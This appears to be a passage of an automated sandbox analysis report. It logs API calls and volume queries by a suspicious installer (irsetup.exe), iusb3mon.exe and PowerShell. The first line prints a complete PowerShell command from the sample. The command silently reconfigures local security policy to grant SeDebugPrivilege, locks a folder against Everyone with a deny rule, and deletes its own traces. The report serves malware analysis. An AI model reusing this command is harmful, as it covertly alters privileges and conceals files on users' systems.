                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0000000180037058
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: _getptd,GetLocaleInfoA,2_2_000000018003715C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: GetLocaleInfoA,2_2_0000000180037244
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00000001800372F8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: GetLocaleInfoA,2_2_000000018003D408
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: GetLocaleInfoW,2_2_000000018003A528
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_000000018003A584
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: _getptd,GetLocaleInfoA,2_2_000000018003758C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: EnumSystemLocalesA,2_2_000000018003769C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: EnumSystemLocalesA,2_2_0000000180037730
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_000000018003779C
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,28_2_001EA219
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: EnumSystemLocalesW,28_2_001E0E38
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: EnumSystemLocalesW,28_2_001E9E55
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,28_2_001EA448
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: EnumSystemLocalesW,28_2_001E9EA0
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_001EA517
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: EnumSystemLocalesW,28_2_001E9F3B
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,28_2_001E135E
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_001EA342
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW,28_2_001E9BB3
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,28_2_001E9DAE
                              Source: C:\ProgramData\Program\iusb3mon.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_001E9FC6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\ProgramData\Program\iusb3mon.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
